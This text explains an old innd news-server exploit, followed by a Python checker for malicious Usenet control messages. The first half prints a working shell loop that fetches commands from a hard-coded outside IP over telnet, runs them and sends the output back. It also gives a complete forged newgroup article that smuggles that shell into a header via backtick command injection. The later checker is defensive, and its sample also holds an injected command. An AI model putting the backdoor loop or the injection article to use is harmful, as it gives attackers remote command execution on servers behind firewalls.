The "intruder-shell" is the following /bin/sh program:

    while :; do
        IN=`/bin/sleep 2 | /bin/telnet 193.12.106.100 23 2>/dev/null | /bin/tail -1`
        if [ X"$IN" != X"$OIN" ]; then
            (/bin/sleep 2; eval "$IN" 2>&1) | /bin/telnet 193.12.106.100 23 >/dev/null 2>&1
            OIN=$IN
        fi
        sleep 30
    done

I will now try to explain how it works:

    repeat (forever)
        wait 2 seconds; connect to port 23 on 193.12.106.100;
        put the last line of what '193.12.106.100' gives us in variable $IN
        if $IN does not equal $OIN (Old IN)
            wait 2 seconds; evaluate $IN as a command and send the results
            to '193.12.106.100' (f.ex. $IN could be '/bin/ls -l /etc')
            assign the value of $IN to $OIN
        end // if
        wait 30 seconds
    end // repeat

The port '23' is by no means a 'randomly chosen port'. It is chosen because, even if most ports to/from a site are blocked with a router/firewall, port 23 is very often allowed to connect to the outside world. The reason? Port 23 is the 'telnet' port, i.e. if a domain allows telnet connections out from its news server, we're in luck!

======================================================================================

A part of the first innd exploit was a remote shell that would be effective behind firewalls. Along with a replaced 'telnetd' on the attacker's computer, this can be used as a "slow shell" to execute commands on a target behind a firewall.
#################### START SLOW SHELL #################################
Path: skyrr.is!news.isnet.is!newsfeed.sunet.se!news99.sunet.se!newsfeed.luth.se!news.luth.se!eru.mt.luth.se!news.algonet.se!nntp.uio.no!sn.no!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9020@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 12

#+
while :; do
IN=`/bin/sleep 2 | /bin/telnet 193.12.106.100 23 2>/dev/null | /bin/tail -1`
if [ X"$IN" != X"$OIN" ]; then
(/bin/sleep 2; eval "$IN" 2>&1) | /bin/telnet 193.12.106.100 23 >/dev/null 2>&1
OIN=$IN
fi
sleep 30
done
#-
#################### END SLOW SHELL #################################
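The article above works because the group name in the Control (and "cmsg" Subject) header reaches a shell unchecked. As an added defensive check, not part of the original post or of innd, here is a small Python parser that pulls the group token out of newgroup/rmgroup control headers and flags any token that is not a legal newsgroup name; the allowed character set, the function names and the two sample articles are my own assumptions and constructions.

```python
import re

# Group names use a conservative set (letters, digits, '.', '-', '_', '+'; an assumed
# common practice). A Control target outside it carrying shell metacharacters is injection.
VALID_GROUP = re.compile(r'^[A-Za-z0-9][A-Za-z0-9._+-]*$')
SHELL_META = set('`$|;&<>(){}\\\'"')
CONTROL_RE = re.compile(r'^(?:cmsg\s+)?(newgroup|rmgroup)\s+(\S+)')

def parse_headers(article):
    """Return the article's headers as {lowercase name: value}, unfolding continuations."""
    head = article.partition('\n\n')[0]
    headers, last = {}, None
    for line in head.splitlines():
        if line[:1] in (' ', '\t') and last:          # folded continuation line
            headers[last] += ' ' + line.strip()
            continue
        name, _, value = line.partition(':')
        last = name.strip().lower()
        headers[last] = value.strip()
    return headers

def is_valid_group(name):
    return bool(VALID_GROUP.match(name))

def check_control(article):
    """List findings for newgroup/rmgroup headers whose group token is not a legal name."""
    findings = []
    headers = parse_headers(article)
    for field in ('control', 'subject'):              # older servers honour 'cmsg' Subject lines
        m = CONTROL_RE.match(headers.get(field, ''))
        if not m:
            continue
        verb, group = m.groups()
        if not is_valid_group(group):
            meta = ''.join(sorted(set(group) & SHELL_META))
            findings.append(f"{field}: {verb} target {group!r} is not a valid group name"
                            f" (shell metacharacters: {meta!r})")
    return findings

# Constructed samples: an ordinary newgroup control message, and the same article with
# the group token replaced by a backtick command substitution as in the post above.
CLEAN = """From: news-admin@example.invalid
Newsgroups: comp.example.test
Subject: cmsg newgroup comp.example.test moderated
Control: newgroup comp.example.test moderated
Approved: news-admin@example.invalid

comp.example.test\tConstructed test group (Moderated)
"""
INJECTED = CLEAN.replace('newgroup comp.example.test', 'newgroup `/usr/bin/id|/bin/sh`')
```

Running check_control over an incoming control feed (or a spool directory) gives a list of findings per article; an empty list means both headers carried a legal group name.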